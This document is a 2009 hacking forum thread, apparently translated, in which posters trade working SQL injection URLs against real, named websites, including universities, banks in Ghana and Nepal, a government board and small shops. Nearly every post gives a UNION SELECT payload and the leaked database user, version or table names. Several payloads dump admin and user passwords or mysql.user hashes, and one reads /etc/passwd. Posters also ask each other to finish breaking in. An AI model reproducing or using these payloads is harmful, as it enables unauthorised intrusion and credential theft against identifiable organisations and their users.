http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,group_concat(table_name),3,4,5 ,6,7,8,9+from+information_schema.tables+group+by+t able_schema+limit+1,200/*

faculty,bitrates_flvvideos,pubs,new_semesters,lk_c ountries,events,people_names,new_courses,jobs,semi nars,current_students,page_index,lk_site,informati csdegrees,counties_us,researchareas,newsbytes_arch ive,lk_program,faculty_researchtopics,br_pubs_peop le,recorder,newmedia_projects,lk_course,eventtypes ,people_researchprograms


################################################## ###
PR 5

http://www.biology.uiowa.edu/faculty_info.php?ID=-91'+union+select+1,concat_ws(0x3a,database(),user( ),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

website:websiteScript@localhost:5.0.45

tables:

computers,tracking_status,followups,templ_inst_sof tware,dropdown_ram,prefs,dropdown_locations,networ king,computers__ID,users,groups,templates,dropdown _type,software,dropdown_network,networking__ID,con fig,inst_software,tracking,event_log,software_bund les,dropdown_os,networking_ports,devices,comp_grou p,kbarticles,tracking__ID,fasttracktemplates,softw are_licenses,dropdown_processor,networking_wire,dr opdown_iface,kbcategories,policy,section,subpolicy ,handbook,directory,,pwusers,FileTypes,downloads,g oogleipaddresses,Meetings,News,Officers,Resources, Events,seqext2,labmembers,auth_user,seqext7,seqext 3,organism,edits,sequence,seqext4,primers,gene,tax group,seqext5,seqext,has,seqext6

I think all the needed tables are closed off :(

DezMond™
13.06.2009, 13:52
http://www.avtoway.ru/news.html?item_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23+from+information_s chema.tables+--+
5.1.26-rc

http://www.off-road-market.ru/item_view.php?id=&item_id=-2492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,versi on(),14,15,16,17,18+--+
5.1.26-rc

http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,concat_ws(0x3a3a,USER_ID,EMAIL,L EVEL_ID,PASS),3,4,5,6+from+site_user+/*+

http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password) ,2,3,4,5,6+from+admins+--+

HAXTA4OK
13.06.2009, 13:56
http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,concat_ws(0x3a,user(),databa se(),version())/*

moddrc@localhost:moddrc:5.0.45

http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,group_concat(table_name)+fro m+information_schema.tables+group+by+table_schema+ limit+1,1/*

Support_Group,cms_admin_users,cms_article_rev,cms_ keyword,Fast_Facts,link_report,ms_messages,online_ resources,contact,LibraryCatalog,Video,cms_article ,cms_calendar_data,cms_keyword_category,disibility packets,ms_batch,ms_sent_to,practices_new,Perspect ives,Web,cms_article_category,cms_cat_art_conn,eve nts,ms_link,ms_test_group,sg_dis_link,cms_picture_ storage,Practices,availability,cms_article_hist,cm s_cite,form_submissions,ms_link_log,notes,supportg roup,cms_relevence

##########################################

PR6

http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14

5.0.67-0ubuntu6:t3_cse:typo3@web1.cse.edu

http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14+from+information_schema.tabl es+group+by+table_schema+limit+1,x

x= {1,2,3...}
tables:

static_tsconfig_help,tt_news_related_mm,sys_histor y,tx_alumdir_alumni,sys_note,tx_chcforum_forumgrou p,sys_workspace,tt_content,tx_cseteamsched_sports, fe_session_data,tx_impexp_presets,pages_language_o verlay,tx_chcforum_thread,tx_rtehtmlarea_acronym,t x_collegedir_service,be_users,tx_volopp_requestor_ volunteer_opportunities_mm, tt_news,sys_be_shortcuts,tx_admrqst_inforeq,sys_la nguage,tx_chcforum_category,sys_preview,tx_chcforu m_mail_log,tt_address,static_languages,tx_cseteams ched_sports,fe_session_data,tx_impexp_presets,page s_language_overlay,tx_chcforum_thread,tx_rtehtmlar ea_acronym,tx_collegedir_service,be_users,tx_volop p_requestor_volunteer_opportunities_mm

dr.Pilulkin
13.06.2009, 14:50
http://crll.gcal.ac.uk/staff_details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,user(),database(),version()),13,14,15--
crlladmin@localhost:crll:5.0.45-community-nt

http://business-school.exeter.ac.uk/module.php?id=-45+union+select+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version()),7,8,9,10,11,12,13,14,15,16,17, 18,19--
sobeadm@snowwhite.ex.ac.uk:sobe:5.0.45-log

udman
13.06.2009, 15:14
http://www.acornhousing.org
http://www.acornhousing.org/TEXT/offices.php?reg=5+UNION+SELECT+0,concat_Ws(0x0b,u ser(),version(),database()),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+LIMIT+7,1+--+&
php@localhost
5.0.24a
ahcws

PR: 6


http://www.ipa.ca
http://www.ipa.ca/regions/reg.php?reg=-1+UNION+SELECT+0,1,2,concat_ ws(0x0b,user(),version(),database()),4,5,6,7,8,9,1 0,11,12+--+
ipaca_princess@localhost
5.0.77-community
ipaca_member

PR: 4


http://bancodeimagenscmpa.procempa.com.br
http://bancodeimagenscmpa.procempa.com.br/visualiza.php?codImagem=-8239+UNION+SELECT+0,1,2,3,concat_ws(0x0b,u ser(),version(),database()),5,6,7,8,9,10,11,12,13, 14+--+
bdimgw@LPROWEB.procempa.com.br
4.0.24_Debian-10sarge1-log
bancoimagenscamarapoa

PR: 2


http://www.lafilmo.com
http://www.lafilmo.com/viaje/pagina.php?reg=-8+UNION+SELECT+concat_ws(0x2b,use r(),version(),database()),2,3,4,5,6,7,8
minisivac@localhost
4.1.22-log
minisivac

PR: 6


http://0382.com.ua
http://0382.com.ua/catalog.php?reg=&cat_1=-26'+UNION+SELECT+concat_Ws(0x0b,u ser(),version(),database())+--+
com0382_com0382@localhost
5.1.35-log
com0382_063

PR: 3


http://coe.ulstu.ru
http://coe.ulstu.ru/index.php?reg=main&action=show_new&id=-94+UNION+SELECT+0,concat_Ws(0x0b,user(),version(), dat abase()),2,3,4,5
coe_ulstu_ru@mercury.ulstu.ru
4.1.25-log
coe_ulstu_ru

PR: 3


http://www.amczn.creamax.su
http://www.amczn.creamax.su/reg_view.php?reg=-4+UNION+SELECT+1,concat_Ws(0x0b,user(),version(),d ataba se()),3,4+--+
creamax_amcznb01@fe61.hc.ru
4.1.22-log
wwwcreamaxsu_amcznbase

PR: 4


http://www.liogrand.ru
http://www.liogrand.ru/bron.php?reg=-6'+UNION+SELECT+0,concat_Ws(0x2b,us er(),version(),database()),2,3,4,5,6,7,8,9,10,11,1 2,13+--+&id=366
Uwww3969S@localhost
5.0.81-log
udb3969

PR: 4


http://www.simnet.ru
http://www.simnet.ru/index.php?reg=main&action=st_page&id_page=-20+UNION+SELECT+concat_ws(0x0b,use r(),version(),database()),1
siteadmin@localhost
5.0.45
muci

PR: 2


http://www.alabamaruralaction.com
http://www.alabamaruralaction.com/detail.php?reg=99&com=-99+UNION+SELECT+concat_Ws(0x0b,user(),databas e(),version())+--+
rroenig_arac@76.163.252.90
rroenig_arac
4.1.20-max-log

PR: 2

SkyLine32
13.06.2009, 16:39
PR 3
http://www.wheelsandwheelsauto.com/carprofile.php?id=-609+union+select+concat_ws(version(),database(),us er()),2,3--
Database Version: 5.0.74sp1-enterprise-gpl-log
Database name: wheel015
User name: wheel015@216.239.136.38
****************
Found an interesting thing... I called it self-DDoS :D
http://www.sabou.net/myspace-comments.php?id=-
****************
Here's another
http://www.bmdw.org/typo3/sysext/
Runs on the typo3 engine. Maybe someone will find it interesting...
****************
This one made me smile in particular :)
http://www.jcgja.com/index.php?action=content&id=1'
Directories can be browsed in a browser.
****************
http://www.psdpjamaica.com/psdp/index.php?action=content&id=-271+union+select+concat_ws(version(),database(),us er()),2,3,4,5,6,7,8,9--
Database Version: 4.1.8-nt
Database name: psdp
User name: jampro2005@cwj-www12.cwjamaica.com
****************
http://www.serikandi.com/news.php?id=-121+union+select+concat_ws(version(),database(),us er()),2,3,4,5,6--
Database Version: 5.0.77-log
Database name: d60523336
User name: u70583365@cgihost
****************
http://www.fgbmfighana.org/news-events/details.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7,8,9--
Database Version: 4.1.22-log
Database name: 341213_fullgospelcms
User name: 341213_alfred@172.16.10.223
****************
http://www.royalbasinresort.com/page.php?id=-4+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: royalba_db
User name: royalba_user@74.50.85.223
****************
PR 3
http://www.ejobsghana.com/website/about/index.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7,8,9--
Database Version: 4.1.22-log
Database name: 342335_ejobscms
User name: 342335_alfred@172.16.10.220
****************
http://www.cic-ghana.com/cic-ghana/news.php?id=-18+union+select+1,concat_ws(version(),database(),u ser()),3,4,5,6--
Database Version: 5.0.67-community-log
Database name: cic_cicgh
User name: cic_naya@localhost
****************
PR 6
http://www.nab.gov.gh/nabsite/pages/press2.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: nabgov_nab
User name: nabgov_nab@74.50.85.19
****************
PR 6
School of Research and Graduate Studies, University of Ghana
http://srgs.ug.edu.gh/annoucement.php?id=-14+union+select+concat_ws(version(),database(),use r()),2--
Database Version: 5.0.32-Debian_7etch6-log
Database name: srgs
User name: root@localhost
****************
http://www.pdaghana.com/page.php?id=-6+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: pdaghan_db
User name: pdaghan_user@216.219.95.52

RulleR
13.06.2009, 23:53
[PR 6]
http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),4,5,6,7,8,9,10,11,12, 13,14,15,16
4.1.10-log:internazionale:internazionale@10.10.0.11
====================
[PR 5]
http://www.photocross.ru/gallery/index.php?c=-72+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4
5.0.51a-community:db_photocross2:photocross2@a15.nthosting .ru
====================
[PR 4]
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user())--&scat=25
5.0.77-community:ga_news:venkat@174.120.39.50
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,pas sword,file_priv)+from+mysql.user--&scat=25
====================
[PR 1]
http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user())
4.1.22:threejc:threejc@localhost

TELO
14.06.2009, 01:04
http://dance.sebastopol.ua/showalbum.php?page_code=-9%20union%20select%201,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6%20%20--

4.0.27-max-log:geokon10:geokon10@v41.valuehost.ru

Gorev
14.06.2009, 03:09
http://www.sarafalcsrl.com/arataimobil.php?id=-46+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38/*


Database Version: 5.0.45-community-nt
Database name: imobile
User name: soim@localhost

AlexSatter
14.06.2009, 09:41
http://www.lemmingtrail.com/t.php?id=110319+and+substring(version(),1,1)=4
----
http://www.eevolute.com/t.php?pageid=1&atid=15&id=14+and+substring(version(),1,1)=5
----
http://map.planetmedalofhonor.gamespy.com/mohaa/t.php?id=82+and+substring(version(),1,1)=4
----
http://www.climatsv.ru/t.php?id=-10+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-log:u50633@10.10.223.224:u50633
----
http://www.zinesters.net/board/t.php?id=66+and+substring(version(),1,1)=4/*

rolex
14.06.2009, 09:41
http://pravo.ruz.net/news/newskom.php3?newsid=-96+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
hardover_pravon:5.0.67-community:hardover_pravo@localhost

//--------------------------------------------//

http://www.bigfootinfo.org/articles/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--

bigfootinfo:5.0.67.d7-ourdelta-log:bigfootinfo@68.178.254.169

mailbrush
14.06.2009, 12:27
amigo-bike.ru
http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version()),8,9,10,11,12,13,14,15,16,17
webadmin@localhost:amigo:5.0.32-Debian_7etch6-log

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F7 06173737764),8,9,10,11,12,13,14,15,16,17

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword),8,9,10,11,12,13,14,15,16,17+from+mysql.user


scooters.moto-bike.ru
http://www.scooters.moto-bike.ru/moto.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6/*
mataru_moto@localhost:mataru_moto:5.0.26-log

Fata1ex
14.06.2009, 14:18
www.safariexpo.ru/news/?id=-1+order+by+9/*
www.garms.ru/deps.php?dep=hunt&rid=-1+order+by+2/*
mailbrush, reread the rules - posting passwords is forbidden.

SkyLine32
14.06.2009, 16:29
PR 4
http://www.vanguardassurance.com/news-events/newsdetails.php?id=-74+union+select+1,concat_ws(version(),database(),u ser()),3,4,5,6,7,8,9--
Database Version: 4.1.22-standard-log
Database name: 334903_vanguardcms
User name: 334903_alfred@172.16.10.133

http://metropolehaiti.ht/metropole/full_une_fr.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7--
Database Version: 5.0.77-community
Database name: metropol_metropolehaiti
User name: metropol_metropo@localhost

http://www.cohadde.org/about/lecture.php?id=1+union+select+concat_ws(version(), database(),user())--
Database Version: 5.0.75-community-log
Database name: bonzouti_cohadde
User name: bonzouti_goldo@localhost

PR 4
http://www.dmc.ee/byro/showtech.php?id=-1+union+select+1,2,concat_ws(version(),database(), user()),4,5,6--
Database Version: 5.0.81-community
Database name: wdmc_dmc
User name: wdmc_wdmc@localhost

http://www.eestishaping.ee/index.php?site=2&id=-0+union+select+1,2,3,4,5,6,concat_ws(version(),dat abase(),user()),8--
Database Version: 5.1.35
Database name: d9992sd7549
User name: d9992sa12606@z136.zone.ee

pelligrim
14.06.2009, 16:38
http://shans.com.ua/?m=nr&in=212&ir=1&id=-23136+union+select+1,concat_ws(0x3a,version(),user (),database()),3--
5.0.81-log:shansco_igor@second.hosted.in:shansco_shans

http://dhp.com.ua/pers_news.php?id=-21+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8--
5.0.82:admindhp@localhost:dhp

farex
14.06.2009, 16:57
CHAPEL OF THE HIGHLANDS
http://www.chapelofthehighlands.com/ecards/getnewsitem.php?newsid=1+union+select+1,2,concat_w s(0x3a2a3a,version(),database(),user(),@@version_c ompile_os),4,5--
5.0.75-community-log*:*chapelo3_ecards*:*chapelo3_chapel@localhost* :*redhat-linux-gnu

M.W.N.N.
14.06.2009, 23:17
http://www.solmetec.com.ve/ver_producto.php?id=229+union+select+1,concat_ws(0 x3a,version(),database(),user()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16++limit+1,1/*
version():4.1.22-standard
database():solmetec_bd
user():solmetec_web@localhost

BHYCHIK
15.06.2009, 03:26
http://www.mlauto.ru/cars.htm?carid=-27+union+select+concat_ws(0x3a,database(),version( ),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21--+

Database: mlauto79
Version: 4.0.27-max-log
OS: unknown-freebsd4.7
User: mlauto79@v16.valuehost.ru

HAXTA4OK
15.06.2009, 09:37
http://www.rutka.net/index.php?novica=337&arhiv=0&p=0&komentarji=0&parametri=naj-bo-nasa-rutka-se-boljsa-z-vasimi-prispevki-dragi-instuktorji&ca_m=6&ca_y=2009&id=1+and+substring(version(),1,1)=5

rolex
15.06.2009, 11:08
http://www.judaicashuk.com/article.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3--
gordons1_judaicashuk:5.0.75-community-log:gordons1_yarok@localhost

//-----------------------------------------------------------------//

http://www.elsy.com.ua/article.php?cid=4&id=1&l=2+union+select+111,222,333,concat_ws(0x3a,databa se(),version(),user()),555--
elsyvid_elsydata:4.1.22-standard-log:elsyvid_elsyuser@216.240.57.214

//-----------------------------------------------------------------//

http://www.hidglobal.com/article.php?id=1+union+select+concat_ws(0x3a,datab ase(),version(),user()),2--
hidcorp:5.0.51a-log:webUser@ws1.hidglobal.com

BlackSun
15.06.2009, 12:04
http://webmuseum.mit.edu/info.php?&v=1&s=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on()),6,7,8,9,10,11,12,13,14,15+--+&type=exh&t=exhibitions
Mobius@localhost:5.0.41-community-nt
2:admin@mit.mit:<pwd_cutted>

http://webmuseum.mit.edu/grabimg.php?wm=1&kv=-1+union+select+1,'../../grabimg.php'+--+

user.php
$addedterm = strtoupper($field) . " = '" . str_replace("'","\'",$criteria) . "'";

a\' OR EMAIL=0x61646d696e406d69742e6d6974 -- -;asdasd

AlexSatter
15.06.2009, 12:41
http://www.tamm-kreiz.com/kalon/tk.php?action=fest&id=20884+and+substring(version(),1,1)=5

erihtoney
15.06.2009, 12:56
http://www.fidelitybank.com.gh/news/details.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9--
4.1.22-standard-log
335104_alfred@172.16.10.133
335104_fidelitycms

AlexSatter
15.06.2009, 13:04
http://edmazur.com/bots/bot.php?s=green&id=149754+and+substring(version(),1,1)=5/*
---
http://www.parkweddings.com/park.php?id=1+and+substring(version(),1,1)=4
---
http://www.sitebuildgroup.com/park.php?ID=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4
4.0.27-max-log:sitesf@208.109.78.136:sitesf
---
http://www.parkbrochures.com/park.php?id=-73+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4
5.0.67-log:parkbrochures@minutemaid.dreamhost.com:parkbro chures
---
http://skateparkreview.com/park.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20
4.0.27-max-log:spradmin@208.109.78.141:spradmin

there is a users table
with the fields usernames, password
---
http://www.credonic.com/park.php?a=d&id=-17171+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8,9,10,11
5.0.77-COMMUNITY:CREDOMAX_CREDO@LOCALHOST:CREDOMAX_CREDON IC
there are databases: credomax_10000, credomax_2000, credomax_4000, credomax_6000, credomax_8000,
Each of them has a table: dsp_buyers; from the name it's clear that buyers are stored there. Passwords, emails, names and so on are in there.
---
http://cityofbartlesville.com/parkcalendar-park.php?cat=1049&event=-1014+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20/*
4.0.27-max-log:pendergraphics@68.178.254.114:pende
---
http://www.nekropolia.pl/park.php?akcja=storyread&id=-71+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4
5.0.75-log:imperio_5@77.55.40.135:imperio_5
a user table, with everything that implies

$n@ke
15.06.2009, 14:08
http://www.ausit.org/eng/showpage.php3?id=650+union+select+concat_ws(0x0a,i d,email,password),2,3+from+members+limit+2,1/*
couldn't guess the admin panel table((
If you manage it, write me a PM.

AlexSatter
15.06.2009, 14:17
http://www.moltravel.nl/park.php?id=22+and+substring(version(),1,1)=5

Gorev
15.06.2009, 14:18
http://www.windoor.ro/index.php?page=article&id=-31+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3

Version : 4.0.24-log
Database : windoor
User : windoor@localhost
Os : pc-linux-gnu

AlexSatter
15.06.2009, 14:25
http://www.aiaccessory.com/part.php?id=-11226+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7
4.0.13:MYSQL0256@webhost1.ch.as12513.net:MYSQL0256
---
http://www.gk-linkor.ru/part.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6
4.1.22-log:gk-linkor_mysql@10.1.22.207:gk_linkor_db
---
http://rusnauka2009.org/part.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10
4.1.22-standard:rusnauk_rusnauk@localhost:rusnauk_biz

$n@ke
15.06.2009, 14:40
http://google.indicateur.biz/index.php3?cat_id=107'+and+substring(version(),1,1 )=4/*
sort of like Google))

user: indicateur@imu96.infomaniak.ch

mailbrush
15.06.2009, 14:44
http://www.iitis.gliwice.pl/en/laboratory.php?ID=-1)+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4/*
webmaster@localhost:iitis:4.1.11

AlexSatter
15.06.2009, 14:52
http://www.tricountyauto.com/part.php?ID=-18+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6
4.0.24-standard:tricount_web@localhost:tricount_db

http://iswebsite.com/part.php?vArticleID=-357+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5
4.1.22-standard:iswebsit_admin@localhost:iswebsit_article

http://www.claudinepisko.be/fr/code/part.php?id=7+and+substring(version(),1,1)=5

http://www.sortecs.ru/comp.php?id=33&idsub=94+union+select+1,2,3,4,5,concat_ws(0x3a,ver sion(),user(),database()),7,8,9,10,11,12,13,14,15, 16/*
4.1.22-log:sortecs2_sortecs@localhost:sortecs2_new

http://www.sctrade.ru/news.php?a=39+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6/*
4.1.22-standard-log:sctrade_admin@web03.nthost.ru:sctrade_main

http://www.osacorp.ru/content.php?id=27&idsub=-49+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13
5.1.29-rc-log:osacorp@localhost:osacorp_main

http://www.msn-media.ru/docs_view.php?ss=-10+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
5.0.67-log:msnmedi_admn@web0103.nthost.ru:msnmedi_msn
http://www.m-furnitura.ru/comp.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12
5.0.67:m-furnitura@localhost:m-furnitura
The site has a forum, phpbb; getting accounts out of it would be no trouble :)
though the forum is empty :)

These sites belong to a certain design studio, Patix. I ran quickly through the portfolio; all the sites are vulnerable.
patix.ru

Dyxxx
15.06.2009, 17:31
A sex shop, damn
www.eros.by
http://www.eros.by/index.php?raz=0&ch=16&prod=703'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,vers ion(),user(),database()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--+
5.0.45:h_erotikon@localhost:h_erotikon
nothing interesting in the database =|
PS don't get the wrong idea, I didn't buy anything there, just passing by :p

molotovkeyt
15.06.2009, 18:12
http://www.transinsular.net/ver_producto.php?id=999999999999999999+union+selec t+1,2,3,4,5/*

http://www.sealquilatodo.com/ver_producto.php?id=9999999999999999999999999+UNIO N+SELECT+1,2,3,4,CONCAT_WS(0x3a,id,usuario,passwor d,nombre,email),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+FROM+usuarios+limit+0,1--

A little shop. PR 2.
http://www.hand-ball.net/ver_producto.php?id=-211+union+select+1,version(),3,4,5,6,7,8,9,0,1,12/*

http://www.baladiavalklein.com/english/ver_producto.php?id=-110+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3 ,14/*

http://www.projectitservices.co.uk/case_studies/details.php?id=-11+union+select+1,2,3,4,5--

PR 5.
http://www.coinsportal.ru/News/Details.php?ID=-229+union+select+1,2,version(),4,5,6--

DezMond™
15.06.2009, 18:16
http://vsestanki.ru/tech.php?pid=-306+union+select+1,concat_ws(0x3a3a,id,pass,name,e mail,perm),3,4,5,6,7+from+users+--+
PS the admin panel probably checks the IP

http://semya.perm.ru/main/news.php?main=1&nid=-213+union+select+1,username,userpass,4,5,6+from+po ll_user+--+

http://www.painter.perm.ru/gallery_short_work.php?id_artist_work=-2636+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a3a,email,login,pass,viewed),12,13,14+from+artis t+limit+2,1+--+

molotovkeyt
15.06.2009, 19:29
PR 4.
http://www.calbank.net/newsite/news/details.php?id=-94+union+select+1,version(),3,4,5,6,7,8,9--

PR 4.
http://www.downtownwaukesha.com/member-details.php?ID=-1190+union+select+1,2,3,version(),5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5--

SUNRISE BANK LIMITED, NEPAL :) PR 3.
http://www.sunrisebank.com.np/news-events/details.php?id=-101+union+select+1,2,version(),4,5,6,7,8,9--
4.1.22
found only the news table. Looks like the only way is to grind through it with character-by-character brute force.
gentlemen, whoever cracks it open, please write me a PM.

Another bank in Nepal.
DCBL Bank Limited. PR 4.
http://www.dcbl.com.np/news-events/details.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9--
4.1.22

DezMond™
15.06.2009, 21:23
Tic300 PR4
http://www.megachip.ru/catalog.php?open_code=-0202+union+select+concat_ws(0x3a3a,login,password, gid)+from+mega_user+where+login=0x61646D696E+--+

http://www.ekperm.ru/main/news.php?menuid=9&section=-88+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,use rname,user_password),9,10,11,12,13+from+phpbb_user s+limit+1,1+--+

mailbrush
15.06.2009, 22:51
http://ownfl.com/owner.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15
ownfl02_ commish@localhost:ownfl02_ownfl:5.0.67-community

HAXTA4OK
15.06.2009, 23:14
http://globalbiz.com.np/view_advertisements.php?id=-1+union+select+1,2,concat_Ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12--

5.0.67-community:globalbi_globprs@localhost:globalbi_mygl obal

..::TROYAN::..
15.06.2009, 23:26
http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*


http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user(),version(),database()),8/*

root@localhost:5.0.45-community-nt-log:amteore

file_priv:Y
pr:2


godly_ecs@localhost:godly_ecs:4.0.26-standard-log
http://www.bj0808.com/mall/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user(),database(),version()),8/*
http://www.bj0808.com/mall/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*

[aywo]
16.06.2009, 07:46
http://www.rendery.com/goods.php?p=good&t_id=-1+union+select+1,2,concat_Ws(0x3a,version(),user() ,database())/*

4.1.22-standard-log
rendery_root@localhost
rendery_db

AlexSatter
16.06.2009, 08:33
http://linux-muzyka.ixion.pl/tekst.php?id=25047+and+substring(version(),1,1)=5

MySQL 3:
http://www.lowiecki.pl/felietony/tekst.php?id=158+and+substring(version(),1,1)=3

http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database())
4.1.22-log:peoplepleasure@node12.cluster.nxs.nl:peopleple asure
There is a table: members

http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database())
4.1.20:magicus_2@localhost:magicus_tmp_2

http://trb-res.nl/tekst.php?id=562+and+substring(version(),1,1)=4

http://www.demo.artframe.nl/tekst.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8/*
4.1.21-standard-log:artframe_demo@localhost:artframe_demo

http://www.kralen.com/tekst.php?id=173+and+substring(version(),1,1)=4

http://www.ogledalce.co.rs/tekst.php?id=228+and+substring(version(),1,1)=5

mailbrush
16.06.2009, 10:02
MsSQL
http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=system_user
FORESTRY\IUSR_ZIRCOTE
http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=db_name()
helpdesk_dynamic
http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=@@version
Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

AlexSatter
16.06.2009, 10:07
http://www.akvarijske-ribe.com/tekst.php?ID=32+and+substring(version(),1,1)=5

http://www.esmayigitoglu.nl/tekst.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8/*
4.1.21-standard-log:esma_db@localhost:esma_db

http://www.windsurf.nieuwetonge.com/tekst.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database()),3
4.0.17-standard-log:nieuwetong@localhost:nieuwetong_cms

mailbrush
16.06.2009, 10:14
http://www.fk-stroy.ru/catalog/abc/index.php?contentId=11212+union+select+1,2,concat_ ws(0x3a,user(),database(),version()),4
u99295@10.10 .153.183:u99295_fkstroy:5.0.67-log

AlexSatter
16.06.2009, 10:33
http://www.hsabc.org/content.php?id=10+and+substring(version(),1,1)=4/*

http://festklaveret.dk/tekst.php?id=-112+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13
5.0.75:fk_site_data@92.61.148.10:fk_site_data

http://tantra-klub.crolink.net/tekst.php?id=1+and+substring(version(),1,1)=4

MySQL version 3
